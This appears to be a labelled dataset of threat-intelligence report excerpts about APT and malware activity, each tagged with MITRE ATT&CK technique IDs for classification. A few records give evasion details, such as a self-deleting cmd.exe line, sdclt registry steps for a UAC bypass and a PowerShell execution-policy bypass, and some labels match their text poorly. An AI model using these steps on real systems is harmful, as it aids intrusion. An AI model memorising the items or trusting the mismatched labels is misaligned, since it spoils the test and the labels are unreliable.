{"text1":"To initially gain access to the environment, Managed Defense analysts identified that FIN6 compromised an internet facing system. Following the compromise of this system, analysts identified FIN6 leveraged stolen credentials to move laterally within the environment using the Windows\u2019 Remote Desktop Protocol (RDP","labels":"['T1003.001', 'T1021.001', 'T1078']"}
|
|
{"text1":"Use of Open Source Tools In an attempt to avoid detection and as an anti-analysis tactic, the OilRig group abused an open source tool called Invoke-Obfuscation to obfuscate the code used for QUADAGENT. Invoke-Obfuscation is freely available via a Github repository and allows a user to change the visual representation of a PowerShell script simply by selecting the desired obfuscation techniques. Invoke-Obfuscation offers a variety of obfuscation techniques, and by analyzing the script we were able to ascertain the specific options in this attack. After identifying the specific options used to obfuscate QUADAGENT, we were able to deobfuscate the PowerShell script and perform additional analysis. We found two obfuscation techniques applied to the script: the first one changing the representation of variables; the second one changing the representation of strings in the script. Invoke-Obfuscation calls the string obfuscation used by the actors to further obfuscate this script Reorder, which uses the string formatting functionality within PowerShell to reconstruct strings from out of order substrings (ex. 1}{0}\" -f 'bar','foo'). During our analysis, we installed Invoke-Obfuscation and used it to obfuscate a previously collected QUADAGENT sample to confirm our analysis. We captured the commands we ran in Invoke-Obfuscation in the animation in Figure 3 below, which visualizes the steps the threat actor may have taken to create the payload delivered in this attack","labels":"['T1059.003']"}
|
|
{"text1":"The purpose of this tool is to parse the hard drive for files with a specific extension and create an archive with these files. Afterward, the module will delete old \"sft\" files assuming they were already exfiltrated. After a pause of 6,500 milliseconds, it will start its search for the targeted files. SFT file creation routine Using the working directory as a base path, which in this sample case is C:\\DOCUME~1\\<USER>~1\\LOCALS~1\\Temp\\4CA-B25C11-A27BC\\, each selected file will be compressed into the file kr.zp","labels":"['T1083']"}
|
|
{"text1":"Cookie Notice . This website uses cookies to help personalize and improve your experience. By Continuing to use this site, you are consenting to the use of cookies. Further research into the IP address hosting the spoofed page revealed a broader campaign to steal credentials. Countries with targeted universities. Source: Secureworks) . After entering their credentials into the fake login page, victims were redirected to the legitimate website where they were automatically logged into a valid session or were prompted to enter their credentials again. Numerous spoofed domains referenced the targeted universities' online library systems, indicating the threat actors' intent to gain access to these resources. CTU\u2122 researchers were unable to confirm functionality of all identified spoofed pages because some of the domains were not accessible at the time of analysis. Domain registrations indicate the infrastructure to support this campaign was still being created when CTU researchers discovered the activity. A domain registered in May 2018 also contained subdomains spoofing university targets. These subdomains redirected visitors to spoofed login pages on other attacker-controlled domains","labels":"['T1583.001']"}
|
|
{"text1":"T1566.001: Spearphishing Attachment - T1566.002: Spearphishing Link - T1566.003: Spearphishing via Service - - - T1204.001: Malicious Link - T1204.002: Malicious File - T1059: Command and Scripting Interpreter T1059.005: Visual Basic - T1059.005: Visual Basic - - T1053.005: Scheduled Task - T1129: Shared Modules - T1106: Native API - T1047: Windows Management Instrumentation - - T1027: Obfuscated Files or Information T1027.002: Software Packing - T1027.002: Software Packing - T1553: Subvert Trust Controls T1553.002: Code Signing - T1553.002: Code Signing - T1218: Signed Binary Proxy Execution T1218.010: Regsvr32 - T1218.010: Regsvr32 - - T1497.001: System Checks - T1497.002: User Activity Based Checks - T1497.003: Time Based Evasion - T1112: Modify Registry - T1070: Indicator Removal on Host T1070.004: File Deletion - T1070.004: File Deletion - T1140: De-obfuscate\/Decode Files or Information - - - T1090.003: Multi-hop Proxy - T1105: Ingress Tool Transfer - - T1055: Process Injection T1055.012: Process Hollowing - T1055.012: Process Hollowing - - T1082: System Information Discovery - T1049: System Network Connections Discovery - T1016: System Network Configuration Discovery - T1057: Process Discovery - T1033: System Owner\/User Discovery - T1518: Software Discovery T1518.001: Security Software Discovery - T1518.001: Security Software Discovery - Persistence T1546: Event Triggered Execution T1547: Boot or Logon Autostart Execution T1547.001: Registry Run Keys \/ Startup Folder - T1546: Event Triggered Execution - T1547: Boot or Logon Autostart Execution T1547.001: Registry Run Keys \/ Startup Folder - T1547.001: Registry Run Keys \/ Startup Folder","labels":"['T1070.004']"}
|
|
{"text1":"After the execution of rundll32.exe, the PowerShell script enu.ps1 is executed. This script is encoded with Base64 in order to avoid detection by antivirus products","labels":"['T1027']"}
|
|
{"text1":"Config.json\" is a mining config file for XMRig, an open-source Monero miner. The file sets the mining pool as xmr[.]pool[.]MinerGate[.]com:45700 and the actor's wallet as rocke@live.cn. This configuration file contains the same actor pool and wallet information as the first. If the shell scripts do not download a miner from 118[.]24[.]150[.]172, they attempt to download a file called \"XbashY\" from 3g2upl4pq6kufc4m[.]tk. TermsHost.exe\" is a PE32 Monero miner. Based on the config file it uses, it appears to be the Monero Silent Miner. This miner can be purchased online for $14 and targets malicious actors. Advertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into \"Windows processes to bypass firewalls. The sample grabs the config file \"xmr.txt,\" which contains the same configuration information as the previous files, from Rocke's command and control (C2) server hosted on sydwzl[.]cn. The sample also creates the UPX-packed file \"dDNLQrsBUE.url\" in the Windows Start Menu Folder","labels":"['T1547.001']"}
|
|
{"text1":"Config.json\" is a mining config file for XMRig, an open-source Monero miner. The file sets the mining pool as xmr[.]pool[.]MinerGate[.]com:45700 and the actor's wallet as rocke@live.cn. If the shell scripts do not download a miner from 118[.]24[.]150[.]172, they attempt to download a file called \"XbashY\" from 3g2upl4pq6kufc4m[.]tk. TermsHost.exe\" is a PE32 Monero miner. Based on the config file it uses, it appears to be the Monero Silent Miner. This miner can be purchased online for $14 and targets malicious actors. Advertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into \"Windows processes to bypass firewalls. The sample grabs the config file \"xmr.txt,\" which contains the same configuration information as the previous files, from Rocke's command and control (C2) server hosted on sydwzl[.]cn. The sample also creates the UPX-packed file \"dDNLQrsBUE.url\" in the Windows Start Menu Folder. Intriguingly, this file appears to share some similarities with Cobalt Strike, the popular penetration testing software, which would allow the attacker to have greater control over the infected system","labels":"['T1027.002']"}
|
|
{"text1":"The ROKRAT author implements several techniques typically seen to frustrate human analysts and avoid sandbox execution. First, the malware does not run on Windows XP systems. The code used to perform this task: The malware checks the process names in use on the victim machine. It compares if the executed process name matches a partial name hardcoded in the sample. Here is the complete list","labels":"['T1057']"}
|
|
{"text1":"In this version, a shortcut is created in order to launch winnit.exe in the following path %USERPROFILE%\\Start Menu\\Programs\\Startup\\Anti virus service.lnk. As in the previous version, the ID of the infected system is generated with exactly the same method. The C2 is different and the analysed version this time only contains a single domain","labels":"['T1547.001']"}
|
|
{"text1":"If yes, it generates an RSA PKCS key using CryptGenKey that is used for encryption of communication session keys. It then writes the RSA key to the PRVK key in the [Version] section of the config file. Turla\u2019s Carbon backdoor also implements RSA encryption on the session keys for some of its C&C channels","labels":"['T1573.002']"}
|
|
{"text1":"root\/.ssh\/{id_rsa, id_rsa.pub}\u00a0\u2013 the SSH pair key used to update the miner from the C&C server using SCP. opt\/{bootsync.sh, bootlocal.sh}\u00a0\u2013 the system startup commands that try to update the miner from the C&C server and run it (see Scripts 7 and 8","labels":"['T1105']"}
|
|
{"text1":"Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. Datper uses an RC4-encrypted configuration to obfuscate HTTP traffic. xxmm (also known as Minzen) \u2014 This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Use malware to upload the large list of enumerated files to the C2 server. Use downloaders or other malware to send the new list to a compromised host. Use an uploader or other malware to send the archived files to an attacker-controlled server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity","labels":"['T1071.001']"}
|
|
{"text1":"Hardcore Nationalist group SideWinder is a threat group active since 2012 according to Kaspersky. This group mainly targets Pakistanis and Chinese military & government entities\u2019 windows machines. They also target mobile phone devices. This is the second time this group is using COVID-19 theme to lure victims, thereby capitalizing on the fear of global pandemic. Sidewinder aka HN2 is believed to be an Indian state sponsored group. A detailed analysis of SideWinder attacks on Pakistani military officials was also published in April","labels":"['T1204.002', 'T1204.001']"}
|
|
{"text1":"The SolarWinds Orion API is vulnerable to authentication bypass that could allow a remote attacker to execute API commands","labels":"['T1203']"}
|
|
{"text1":"Grandoreiro\u2019s DGA uses two strings (prefix and suffix) hardcoded in the binary and the local date as inputs. Note that based on the DGA, a different website is required for each day. We have observed some variants also using a custom base64 alphabet","labels":"['T1568.002']"}
|
|
{"text1":"WastedLocker will attempt to encrypt files on local as well as remote (network adjacent and accessible) and removable drives","labels":"['T1135']"}
|
|
{"text1":"The infection chain starts with an email in which the victim receives a download link that fetches the first-stage downloader. As we found in our analysis, this first-stage downloader is responsible for fetching a malicious MSI file hosted on an\u00a0attacker-controlled GitHub page. This MSI file is downloaded and executed on the endpoint. As a result, a malicious Python-compiled binary is dropped on the file system, which uses the Dropbox API for command-and-control (C&C) communication","labels":"['T1566.002', 'T1105', 'T1102.002', 'T1204.001']"}
|
|
{"text1":"At the second stage, the attackers remotely connected to the device and scanned the local network seeking to gain access to public shared folders, web servers, and any other open resources. The aim was to harvest information about the network, above all, servers and workstations used for making payments. At the same time, the attackers tried to brute-force or sniff login data for such machines. If the firewall blocked access from one segment of the network to another, but allowed a reverse connection, the attackers used a different payload to build tunnels","labels":"['T1040']"}
|
|
{"text1":"As a result of all of the above actions, when attempting to surf the web, the user\u2019s web browser will first ask the attacker web page on TOR for proxy settings. The user traffic is then redirected through a proxy controlled by the attacker, who carries out a Man-In-the-Middle attack and impersonates the various sites the user attempts to surf. The attacker is free to read the victim\u2019s traffic and tamper with it in any way they please","labels":"['T1557']"}
|
|
{"text1":"After execution, Ragnar Locker Ransomware encrypts the files and adds the extension \u201c.ragnar\u201d and an 8 digit number","labels":"['T1486']"}
|
|
{"text1":"When referring to additional plugins, it is worth noting that in early versions of Valak the plugins were downloaded by the second stage JS via PowerShell. More recent versions of Valak abandoned the popular yet easily detectable PowerShell downloader approach and transitioned to PluginHost as a means of managing and downloading additional payloads. This transition indicates that the Valak authors are looking for stealthier approaches and ways to improve their evasion techniques","labels":"['T1059.001']"}
|
|
{"text1":"Controlled by Micropsia operators, the malware is able to register to an event of USB volume insertion to detect new connected USB flash drives. Once an event is triggered, Micropsia executes an RAR tool to recursively archive files based on a predefined list of file extensions (*.xls, *.xlsx, *.csv, *.odt, *.doc, *.docx, *.ppt, *.pptx, *.pdf, *.mdb, *.accdb, *.accde, *.txt","labels":"['T1560.001', 'T1119']"}
|
|
{"text1":"We were able to source a sample that may be the malware involved in the May 2018 attacks. We ran it, and it broke the boot sector as expected (see Figure\u00a01). An initial analysis of the file revealed it was created using Nullsoft Scriptable Install System (NSIS), an open-source application used to create setup programs. The actor behind this threat used the application and purposely named it \u201cMBR Killer. There are no indications of network-related behavior in this malware","labels":"['T1027']"}
|
|
{"text1":"In some attacks, Whitefly has used a second piece of custom malware, Trojan.Nibatad. Like Vcrodat, Nibatad is also a loader that leverages search order hijacking, and downloads an encrypted payload to the infected computer. And similar to Vcrodat, the Nibatad payload is designed to facilitate information theft from an infected computer","labels":"['T1027']"}
|
|
{"text1":"Creates a new registry key HKCU\\Software\\Classes\\Folder\\shell\\open\\command - Sets the \u201cDefault\u201d value to \u201cpath of the malware\u201d - Creates a value \u201cDelegateExecute\u201d and sets the value to \u201c0\u201d - Executes %systemDirectory%sdclt.exe to bypass the UAC as shown below (figure 7","labels":"['T1112']"}
|
|
{"text1":"These two files, keyword_parm.txt and parm.txt contain instructions for MESSAGETAP to target and save contents of SMS messages","labels":"['T1560.003']"}
|
|
{"text1":"1) Send initial proxy module request. The initial request contains the bot ID, external IP address of the infected machine, reverse DNS lookup of the external IP address, internet speed (measured earlier) and seconds since the proxy module started. 2) Establish a connection (proxy commands sequence 1->10->11) with the PROXY-C2. 3) Initialize sessions, perform socks5 authorization with login\/password (received from PROXY-C2 with command 10). 4) Begin SOCKS5-like communication wrapped into the QakBot proxy module protocol","labels":"['T1090.002']"}
|
|
{"text1":"A technical relevant fact about this campaign is the use of Python embedded into Windows executables of the malware. There is no multi-platform support as the code is heavily Windows-oriented (use of libraries). However, we discovered several clues that the attackers prepared the infrastructure for Mac OS X and Unix victims as well. In addition to Windows components, we also found a mobile (Android) component","labels":"['T1053.005', 'T1059.006']"}
|
|
{"text1":"The second version does not carry the payload directly but instead downloads it from a C2 into the same location as before. The C2 server address is embedded in the main executable in the TinkaOTP bundle. The hardcoded download and execution code are easily visible as they are unencrypted, plain UTF strings in the binary","labels":"['T1105']"}
|
|
{"text1":"Guloader is a downloader that has been active since 2019. It is known to deliver various malware, more notably: Agent-Tesla, Netwire, FormBook, Nanocore, and Parallax RAT","labels":"['T1102']"}
|
|
{"text1":"All of the backdoors identified \u2013 excluding RoyalDNS \u2013 required APT15 to create batch scripts in order to install its persistence mechanism. This was achieved through the use of a simple Windows run key","labels":"['T1059.003']"}
|
|
{"text1":"Once communication with the C2 server has been established, QakBot is known to download and use additional modules in order to perform its malicious operations","labels":"['T1095', 'T1105']"}
|
|
{"text1":"This DLL has no other noticeable characteristics, as it functions like a typical malicious sideload. After loading the encrypted payload in memory, it transfers the execution to a shellcode that is located at the beginning of the file. Once loaded in memory, the ZeroT shellcode does not present any kind of obfuscation, unlike that for PlugX. As in the new PlugX dropper detailed below, this is done using RC4 and RtlDecompressBuffer. As in PlugX samples, the PE header of ZeroT has been tampered with, specifically the \u201cMZ\u201d and \u201cPE\u201d constants (Fig","labels":"['T1574.002']"}
|
|
{"text1":"One legitimate executable, sometimes signed, and vulnerable to dynamic-link library (DLL) sideloading - One malicious DLL loaded by the legitimate file - One binary file usually containing obfuscated code, unpacked in memory by the malicious DLL","labels":"['T1574.002', 'T1574.002', 'T1574.002']"}
|
|
{"text1":"The `Download3rdStage` will first decode `https:\/\/discord.com` and try to connect to it. Then, it performs a time-based anti-debug check, as shown in the code below. If any of these checks fail, the DLL will not download the third stage","labels":"['T1497.003']"}
|
|
{"text1":"TrickBot's new API-Hammering explained . Published on: 13.07.2020 As usual, at Joe Security, we keep a close eye on evasive malware. It turned out to be a new TrickBot sample using API hammering to bypass analysis. Two Stage API Hammering . Right after the entry point, the sample tries to load taskmgr.exe as a DLL: This is likely a trick to bypass emulators that do not check if a given DLL exists if LoadLibraryEx is called. Since before the loop\u00a0FreeConsole has been called all printf calls do basically nothing: This code has been directly copied from the documentation of printf: So what is the purpose of those numerous\u00a0printf loops. As a result, the massive amount of calls delay the execution process and overload the sandbox with junk data. This behavior is called API Hammering. API Hammering is not a new technique, we have already seen it several years ago e.g. Joe Sandbox detects the API hammering successfully and rates it as malicious: Right after the printf flood, the sample performs another loop to delay execution by creating and writing to a temporary file - the second stage. In between it performs random sleeps: Again, the purpose is to overload the sandbox and delay the execution. No matter what technology your favorite sandbox uses, it has to handle API Hammering correctly","labels":"['T1106']"}
|
|
{"text1":"When generating the URLs within the HTTP POST and GET requests, XAgent sets one HTTP parameter using a specific data structure that contains this agent_id value. This parameter transmits the agent_id to the C2 server to obtain commands the actor wishes to execute on the compromised system. The data structure used to transmit the agent_id to the C2 is as follows","labels":"['T1106']"}
|
|
{"text1":"Inception\u2019s malware is modular and the attackers will load plugins based on requirements for each attack. The group has used a range of plugins in recent attacks, some of which are improved versions of plugins used in 2014, while others were previously unseen","labels":"['T1057']"}
|
|
{"text1":"When running under a limited UAC account, the installer extracts d3d9.dll and creates a persistence key under HKCU\\Software\\Microsoft\\Windows\\Run","labels":"['T1547.001']"}
|
|
{"text1":"The process begins with the consistent execution of a malicious DLL using the legitimate regsvr32.exe Windows Utility. Once executed, the DLL is deleted from the system and its components are dropped to the system","labels":"['T1218.010']"}
|
|
{"text1":"Following the initial compromise, in many instances the BackdoorDiplomacy group employed open-source reconnaissance and red-team tools to evaluate the environment for additional targets of opportunity and lateral movement. Among the tools documented are","labels":"['T1105', 'T1588.002']"}
|
|
{"text1":"Once the library is called by one of the triggering events implemented in its code, it reads a configuration file from a shared Google Document. If it is not able to connect to the address, it uses a hardcoded one","labels":"['T1565.002']"}
|
|
{"text1":"Hildegard uses LD_PRELOAD to hide the malicious process launched inside the containers. The malware modified the \/etc\/ld.so.preload file to intercept shared libraries\u2019 imported functions","labels":"['T1574.006']"}
|
|
{"text1":"The threat actor connected via Remote Desktop from a Domain Controller to a vCenter server and opened a PowerShell console, then used the PowerShell command -ep bypass to circumvent the execution policy. Using the Windows Azure Active Directory PowerShell Module, the threat actor connected to the victim\u2019s O365 tenant and began performing enumeration queries","labels":"['T1087.002', 'T1482']"}
|
|
{"text1":"Targets are sent spear phishing e-mails that lead them to a web site displaying a lure document and are immediately prompted to install a malicious Google Chrome extension. It then redirects the user to install a \u201cFont Manager\u201d extension from the Chrome Web Store, as seen in Figure 2. Figure 2: HTML Source of Phishing Page The malicious extensions, now removed from the Chrome Web Store, contain reviews left by the threat actor using compromised Google+ accounts. It should be noted however, that some users reported deleting the extension immediately because it prevented the Chrome browser from functioning properly. The malicious Chrome extensions declare permissions to run on every URL in the browser, as seen in Figure 3. Loading jQuery.js from an external site makes no sense, since the latest version of extension has a legitimate jQuery.js included in the extension bundle. Figure 4:\u00a0Given the threat actor\u2019s propensity for password theft, and the fact that the malicious Chrome extensions were situated to read data from every website, it's likely that the intent is to steal browser cookies and passwords. Figure 5: Certificate used to sign MECHANICAL\/GREASE While the threat actors did use a few tools to automate intrusions, we also found a ZIP archive of tools that demonstrate their propensity for password theft to propagate. Advise users to be wary of any prompts to install browser extensions, even if they are hosted on an official extension site. They spent significant time and resources doing reconnaissance on their targets, as evidenced by the comments left on the Chrome extension page","labels":"['T1176']"}
|
|
{"text1":"After the payload execution it reaches out to the C2 via POST request as shown below","labels":"['T1071.001']"}
|
|
{"text1":"All RDAT samples have malicious verdicts in WildFire and have protections in place through Cortex XDR. DNS tunneling protocols used for C2 communications are blocked via DNS Security. All C2 domains are classified as Command-and-Control for URL Filtering. AutoFocus customers can monitor activity via the rdat_backdoor tag","labels":"['T1132.002', 'T1132.001']"}
|
|
{"text1":"Endpoint Protection . The Trojan.Hydraq Incident . It has been about a week since news of the mysterious Hydraq Trojan (also known as Aurora) attack broke with the unveiling of a threat by Google to pull its operations out of China. In addition the blog also mentioned that a host of other large corporations were also targets of this same attack. In this attack a PDF file was used to exploit the Adobe Acrobat, Reader, and Flash Player Remote Code Execution Vulnerability (CVE-2009-1862\/BID35759). This PDF installed a Trojan horse which was an earlier version of the current Trojan.Hydraq. Considering the efforts that the attackers put into staging the attack as a whole, the end malware is not so sophisticated. Download a remote file, save it as %Temp%\\mdm.exe, and then execute it. This means the remote attacker has the ability to see in real time any user interface activity as if they were sitting right next to the user. As described in the previously posted blog (Hydraq - An Attack of Mythical Proportions), an unpatched Internet Explorer vulnerability (BID 37815) was used as one of the propagation vectors for this particular Trojan.Hydraq attack. This security hole allows remote exploitation, which means that attackers can run any malicious code of their liking on a victim\u2019s machine by taking advantage of the vulnerability. Prevention & Mitigation Trojan.Hydraq has been known to be spread through specially crafted PDF files and also through malicious Web sites. The attacker can exploit this issue by supplying a malicious Flash ('.swf') file or by embedding a malicious Flash application in a PDF file","labels":"['T1105']"}
|
|
{"text1":"We mentioned earlier that docx files (like xlsx and pptx) are part of the OOXML standard. The document defining this standard[6], describes the syntax and values that can be used as an example. An interesting file to look at is the \u2018settings.xml\u2019 file that can be discovered in the \u2018Word\u2019 container of the docx zip file. This file contains settings with regards to language, markup and more. First, we extracted all the data from the settings.xml files and started to compare. All the documents below contained the same language values","labels":"['T1221']"}
|
|
{"text1":"FireEye has dubbed the cybercrime gang FIN5. One of the most unique things about FIN5 is that in every intrusion we responded to where FIN5 has been active, legitimate access was identified. They had valid user credentials to remotely log into the network,\" said Barry Vengerik, principal threat analyst at FireEye. No sexy zero-days, no remote exploits -- not even spearphishing","labels":"['T1110']"}
|
|
{"text1":"It looks like GrowlHelper creates an executable named Software Update Check when it thinks it\u2019s online. I was pretty excited when I first found this, but quickly realized it just drops a copy of itself with a different name","labels":"['T1036.004']"}
|
|
{"text1":"FireEye assesses APT33 may be behind a series of intrusions and attempted intrusions within the engineering industry. FireEye's Managed Defense has responded to and contained numerous intrusions that we assess are related. The actor is leveraging publicly available tools in early phases of the intrusion; however, we have observed them transition to custom implants in later stage activity in an attempt to circumvent our detection","labels":"['T1555', 'T1003.001', 'T1552.001', 'T1003.005', 'T1555.003', 'T1552.006', 'T1003.004', 'T1588.002']"}
|
|
{"text1":"PowerPunch also provides an excellent example of this. The key is applied to an executable payload downloaded directly from adversary infrastructure, allowing for an encryption key unique to the target host (highlighted variables names were changed for clarity","labels":"['T1105']"}
|
|
{"text1":"The attackers manually send a command to the JS or C# component to drop and execute a batch file from one of their servers. That batch file writes a malicious INF file and supplies it as a parameter to the Microsoft utility cmstp.exe, which executes a remote scriptlet specified in the INF file. This technique has been documented in the MITRE ATT&CK knowledge base as CMSTP; an example of how this technique is used may be found here. This technique has been used in the past by Cobalt, another financially motivated group. The remote scriptlet contains obfuscated JS code that drops an OCX file and executes it via regsvr32.exe","labels":"['T1059.007']"}
|
|
{"text1":"cmd.exe \/C choice \/C Y \/N \/D Y \/T 2 & Del After sleeping, the Trojan will create a GUID and write it to %APPDATA%\\Windows\\GDI.bin. It then moves itself to %APPDATA%\\Windows\\WindowsImplantment.exe and sets both of these files to have the hidden and system flags to hide them from the user. With the Trojan moved to its final location, it will then create a scheduled task to run a VBScript to make sure it runs persistently. This differs from the previous OopsIE variant that used a hardcoded task name for the scheduled task. This process ultimately attempts to run the Trojan every three minutes, which is important as OopsIE relies on this scheduled task as it does not include a main loop to continue its execution. After creating this scheduled task for persistence, the Trojan will begin communicating with its C2 server. The process in which the Trojan communicates with its C2 server is very similar to the previous OopsIE Trojan that we discussed in our previous blog. Also, the oops string used to signify an erroneous transmission from the C2, which gave OopsIE its name, is reversed to spoo. hex(STDOUT of whoami command)> If the C2 server wishes to send a command, it will respond to the beacon above by echoing the whoami command results sent by the Trojan to the C2 in the URL. The command handler in this OopsIE variant is very similar to the previous version, as it contains the same three (1, 2 and 3) commands seen in Table 2","labels":"['T1105']"}
|
|
{"text1":"In October 2016 Group-IB published the report about the Cobalt group. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. However, when there is use of a security policy that prohibits the transfer of encrypted archives, such an email message may be blocked, so the attackers would send .doc files that contain exploits for Microsoft Office (fig. For organizations that perform timely updates of their systems and adhere to strict security policies, the Cobalt group employs another method to deliver malicious code through emails with Word documents containing a malicious macro. Therefore, the Cobalt group registered domains that are similar to real ones (for example, diebold.pw), and configured their email server to distribute mail acting as these legitimate domains (fig. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. From our experience, the Cobalt group uses a new method to provide its survivability in every attack. Additional means of circumventing anti-virus tools include the use of exploits to increase the level of rights and privileges, bypassing UAC, and injecting code into trusted processes. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and searches for critical servers and the computers from which they are accessed","labels":"['T1068']"}
|
|
{"text1":"The dropped payload is a DLL file that has been packed using the UPX packer. The unpacked sample is highly obfuscated and important API calls and strings have been encrypted using a custom encryption algorithm. Whenever in the code the malware needs to use a string, it takes the encrypted string and passes it into two functions to decrypt it","labels":"['T1027.002']"}
|
|
{"text1":"This document likely marks the first observed use of this technique by APT28. The use of DDE with PowerShell allows an attacker to execute arbitrary code on a victim\u2019s system regardless whether macros are enabled","labels":"['T1559.002']"}
|
|
{"text1":"POWERTON is a backdoor written in PowerShell; FireEye has not yet identified any publicly available toolset with a similar code base, indicating that it is likely custom-built. POWERTON is designed to support multiple persistence mechanisms, including WMI\u00a0and auto-run registry key. POWERTON typically gets deployed as a later stage backdoor and is obfuscated several layers","labels":"['T1547.001']"}
|
|
{"text1":"A batch file that is used to run Bitsadmin and Rundll to download and execute the Egregor payload. A Zip file contains a binary file that is an RClone client, renamed svchost, and RClone config files (webdav, ftp and dropbox) used later for exfiltration","labels":"['T1059.003']"}
|
|
{"text1":"The screenshot above shows an abbreviated view of the in-memory PowerShell backdoor. The PowerShell backdoor has the following capabilities","labels":"['T1049', 'T1518', 'T1027']"}
|
|
{"text1":"The archive contains two files; the first is an executable file, while the second is a decoy PDF document. The bear\u2019s lair . The Stage-1 downloader will download and execute a new downloader, written in C++, not so different from other Zebrocy downloaders. How the bear hunts . In this section we describe in more detail the commands performed manually by the operators through their Delphi backdoor. As we did not identify a pattern in the order which the commands are invoked, we believe the operators are executing them manually. The first set of commands gathers information about the victim\u2019s computer and environment: The commands above are commonly executed when the operators first connect to a newly activated backdoor. Moreover, the backdoor contains a list of filenames related to credentials from software listed below (database names): The operators take care of retrieving these databases if they are present on the victim\u2019s computer. The operators retrieve these files on the machine using the DOWNLOAD_LIST command. This command can be used when the operators are aware of the presence of interesting files on the computer. This backdoor is executed using the CMD_EXECUTE command: There are some interesting facts here. The first set of commands is the same and executed during a very short timeframe, which raises another question: is it automated","labels":"['T1083']"}
|
|
{"text1":"The reason for this is that most of the file comprises meaningless overlay data, since the file is an automatically generated AutoIT executable with an AutoIT3 script embedded inside. Once started, it downloads additional malware from the C2 and also uploads some basic system information, stealing, among other things, the user\u2019s Google Chrome credentials. The backdoor also pings the C2 server at regular intervals. A good security analyst can spot this while analyzing firewall log files and thereby find out that something suspicious might be going on in the network","labels":"['T1105']"}
|
|
{"text1":"Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. xxmm (also known as Minzen) \u2014 This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Use the \u2018at' or \u2018schtask' commands to register a scheduled task to be executed in a few minutes. Use malware to upload the large list of enumerated files to the C2 server. Use downloaders or other malware to send the new list to a compromised host. Use an uploader or other malware to send the archived files to an attacker-controlled server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity. In particular, review network access for use of mobile USB modems on corporate systems","labels":"['T1547.001']"}
|
|
{"text1":"This structure parses out executable scripts from data provided via a remote operator. In this case, the REGEX value indicates this implant will receive scripts compressed (tar files). The malware will then decompress them before executing the embedded script. Analysis indicates the WellMail implant is similar in design and structure to the WellMess implant -- and both accept and execute shell scripts from a remote operator","labels":"['T1105']"}
|
|
{"text1":"Narrow attacks targeted the Automotive industry among others, while the large malicious spam campaigns appear to be associated with threat actor TA505, an actor responsible for many large-scale attacks since at least 2014","labels":"['T1204.002']"}
|
|
{"text1":"We have discovered that malware dubbed WinDealer, spread by Chinese-speaking APT actor LuoYu, has an ability to perform intrusions through a man-on-the-side attack","labels":"['T1204.001', 'T1566.002', 'T1566.001', 'T1566.002', 'T1120']"}
|
|
{"text1":"Finally, the malware changes the password of the local users. In the files analyzed, all the passwords chosen by the actor have the same pattern: Aa153","labels":"['T1531']"}
|
|
{"text1":"The configuration file for Torisma is encrypted using the algorithm VEST[1] in addition to the communication sent over the C2 channel. From our research this encryption method is not commonly used anywhere, in fact it was a proposed cipher that did not become a standard to be implemented in general technologies[2","labels":"['T1041', 'T1573.001']"}
|
|
{"text1":"In response to historical disclosures detailing TA416 PlugX malware infection and encoding methods, the group appears to have adopted a rapid rate of development for their PlugX payloads. The group uses different legitimate PE files to initiate sideloading, as well as a variety of PlugX DLL loaders including the PotPlayer and DocCon versions noted in this publication. TA416 also uses different variants of the final PlugX payload in which the communication routines are observed to be different when closely analyzed. Additionally, the payload DAT file decryption method has evolved regularly since the beginning of 2022. Several observed decryption schemas and a sample configuration are included below with date ranges detailing the evolution of observed PlugX payloads","labels":"['T1027']"}
|
|
{"text1":"Usually, after infection the bot sends a \u2018PING\u2019 message, \u2018SYSTEM INFO\u2019 message and \u2018ASK for COMMAND\u2019 message, and the C2 replies with \u2018ACK\u2019 and \u2018COMMAND\u2019 messages. If additional modules were pushed by the C2, the bot sends a \u2018STOLEN INFO\u2019 message containing data stolen by the modules","labels":"['T1041']"}
|
|
{"text1":"The malware can use 2 different public RSA keys: one exported using the crypto api in a public blob or using the embedded in base64 in the malware. The malware will only use the second one if it cannot create the crypto context or has some problem with the crypto api functions","labels":"['T1106']"}
|
|
{"text1":"Pillowmint is usually installed through a malicious shim database which allows the malware to persist in the system","labels":"['T1546.011']"}
|
|
{"text1":"1) An application is bundled with virtualization software, a Linux image and additional files used to achieve persistence. 2) User downloads the application and follows attached instructions on how to install it. 3) LoudMiner is installed first, the actual VST software after. 4) LoudMiner hides itself and becomes persistent on reboot. 5) The Linux virtual machine is launched and the mining starts. 6) Scripts inside the virtual machine can contact the C&C server to update the miner (configuration and binaries","labels":"['T1569.002', 'T1218.007']"}
|
|
{"text1":"Once on the network, the attackers engaged in network reconnaissance and retrieved a list of trusted domains and a list of domain controllers with the following commands","labels":"['T1482']"}
|
|
{"text1":"When REvil was first discovered, it was delivered to targets via exploitation of Oracle WebLogic vulnerabilities. There are reports that the threat actors leveraged a strategic web compromise (SWC) to deliver REvil by compromising the Italian WinRAR . it website and replacing the WinRAR installation executable with an instance of the malware. The SWC resulted in the infection of unsuspecting WinRAR customers' systems. In other reports, threat actors breached at least three managed service providers (MSPs) and used the access to deploy REvil to the MSPs' customers. The diversity and complexity of delivery mechanisms employed by the REvil threat actors in a short period of time suggest a high level of sophistication","labels":"['T1189']"}
|
|
